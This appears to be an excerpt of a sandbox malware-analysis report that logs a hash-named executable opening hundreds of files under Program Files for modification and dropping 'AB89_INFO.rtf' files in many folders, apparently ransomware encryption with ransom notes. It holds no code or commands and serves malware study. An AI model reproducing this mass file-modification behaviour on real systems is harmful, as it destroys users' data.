C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\id.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Abidjan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jinfo.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ulaanbaatar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\manifest.json 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\GRAY.pf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Riga 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\README.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santa_Isabel 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Toronto 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Kerguelen 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search5.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Moscow 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\CopyReset.ADTS 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Gaza 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\83.0.4103.106.manifest 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ml.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Cordoba 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Mail\WinMail.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Hobart 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\SelectOptimize.midi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.access 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\LICENSE 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Lima 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novosibirsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Taipei 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santarem 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Cairo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\te.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Samarkand 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\org-openide-filesystems.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rainy_River 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Rangoon 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia_Banderas 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Recife 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+1 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\skins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl 